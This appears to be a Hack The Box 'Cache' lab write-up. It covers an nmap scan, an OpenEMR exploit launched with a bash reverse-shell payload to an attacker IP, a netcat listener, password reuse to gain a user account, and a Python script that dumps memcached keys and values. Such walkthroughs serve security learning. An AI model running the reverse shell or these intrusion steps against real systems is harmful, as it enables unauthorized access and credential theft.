```text
# Nmap 7.80 scan initiated Sun Aug  9 12:47:22 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug  9 12:49:26 2020 -- 1 IP address (1 host up) scanned in 123.77 seconds
```
```text
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $python poc.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.16.8/1337 0>&1'

        ={ P R O J E C T   I N S E C U R I T Y }=

        Twitter : @Insecurity
        Site    : insecurity.sh

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload
```
```text
┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.188.
Ncat: Connection from 10.10.10.188:35164.
bash: cannot set terminal process group (2020): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Once we have a shell as www-data, the password recovered earlier from the application source code is reused by the local account ash, so `su` to that user succeeds with it.
```text
www-data@cache:/home$ su - ash
Password: 
ash@cache:~$ cd
ash@cache:~$ cat user.txt
d3a9cb94055ba6e0087aec05b250b271
```
## Root.txt
### Memcache
Listing the local listening ports shows the target listening on 11211 (alongside MySQL on 3306). Looking up the process that owns that port confirms it is memcached; the `-l 127.0.0.1` flag means it is bound to loopback only and the `TIME_WAIT` connections to it show that something on the box is actively using the cache. Note that unprivileged `netstat` prints `-` in the PID column for processes we do not own, which is why `ps -ef` is needed to identify the service.
```text
ash@cache:/dev/shm$ netstat -anutp | grep 127.0.0.1
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:55136         127.0.0.1:11211         TIME_WAIT   -
tcp        0      0 127.0.0.1:55168         127.0.0.1:11211         TIME_WAIT   -
udp        0      0 127.0.0.1:41070         127.0.0.53:53           ESTABLISHED -
ash@cache:/dev/shm$ ps -ef | grep 11211
memcache   943     1  0 Aug08 ?        00:00:24 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memcached.pid
ash      20763 17528  0 07:32 pts/0    00:00:00 grep --color=auto 1121
```
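Memcached has no authentication, so anyone who can reach the loopback port can read whatever the application has cached. The script below is an added example (not from the original write-up) of how to enumerate it with the documented text-protocol commands `stats items`, `stats cachedump <slab> <limit>` and `get <key>`: list the slabs that hold items, dump the key names in each slab, then fetch each value. The sample responses embedded in it are constructed for offline testing; the key names and values in them are made up and are not the contents of this box.

```python
"""Enumerate keys and values in a memcached instance over its text protocol.

Added example, not part of the original write-up. Only documented memcached
commands are used. The SAMPLE_* responses are constructed test data.
"""
import re
import socket

# Constructed sample of a `stats items` reply: slabs 1 and 4 hold items.
SAMPLE_STATS_ITEMS = (
    b"STAT items:1:number 3\r\n"
    b"STAT items:1:age 1234\r\n"
    b"STAT items:4:number 1\r\n"
    b"STAT items:4:age 10\r\n"
    b"END\r\n"
)

# Constructed sample of a `stats cachedump 1 100` reply.
SAMPLE_CACHEDUMP = (
    b"ITEM user [5 b; 1596980000 s]\r\n"
    b"ITEM passwd [8 b; 1596980000 s]\r\n"
    b"END\r\n"
)

# Constructed sample of a `get passwd` reply (made-up value).
SAMPLE_GET = b"VALUE passwd 0 8\r\nhunter22\r\nEND\r\n"


def parse_slab_ids(stats_items: bytes) -> list[int]:
    """Return the slab ids that hold at least one item, from `stats items` output."""
    slabs = []
    for line in stats_items.decode(errors="replace").splitlines():
        m = re.match(r"STAT items:(\d+):number (\d+)$", line)
        if m and int(m.group(2)) > 0:
            slabs.append(int(m.group(1)))
    return slabs


def parse_cachedump(dump: bytes) -> list[str]:
    """Return the key names listed in `stats cachedump` output."""
    return [line.split()[1]
            for line in dump.decode(errors="replace").splitlines()
            if line.startswith("ITEM ")]


def parse_get(resp: bytes) -> dict[str, bytes]:
    """Return {key: value} from a `get` reply, using the declared byte length.

    A `get` reply is zero or more `VALUE <key> <flags> <bytes>\\r\\n<data>\\r\\n`
    blocks followed by `END\\r\\n`; a cache miss is just `END\\r\\n`.
    """
    values = {}
    while resp.startswith(b"VALUE "):
        header, _, rest = resp.partition(b"\r\n")
        _, key, _flags, nbytes = header.split()[:4]
        n = int(nbytes)
        values[key.decode(errors="replace")] = rest[:n]
        resp = rest[n + 2:]  # skip the data block and its trailing \r\n
    return values


def _command(sock: socket.socket, cmd: bytes) -> bytes:
    """Send one command and read until the terminating END line."""
    sock.sendall(cmd + b"\r\n")
    buf = b""
    while not buf.endswith(b"END\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def dump_memcached(host: str = "127.0.0.1", port: int = 11211,
                   limit: int = 100) -> dict[str, bytes]:
    """Connect to memcached and return every key/value it will reveal.

    Caveat: `stats cachedump` returns at most `limit` keys per slab and can be
    disabled in newer builds, so an empty result does not prove the cache is empty.
    """
    found = {}
    with socket.create_connection((host, port), timeout=5) as sock:
        for slab in parse_slab_ids(_command(sock, b"stats items")):
            dump = _command(sock, b"stats cachedump %d %d" % (slab, limit))
            for key in parse_cachedump(dump):
                found.update(parse_get(_command(sock, b"get " + key.encode())))
    return found


if __name__ == "__main__":
    # On this box memcached listens on loopback only, so run this on the
    # target itself or through an SSH port forward.
    for k, v in dump_memcached().items():
        print(f"{k} = {v!r}")
```

Because memcached is bound to 127.0.0.1, the script has to run on the target (or through a forwarded port); the `-u memcache` flag in the process list also means that whatever is stored there is readable by any local user who can open the socket, regardless of file permissions.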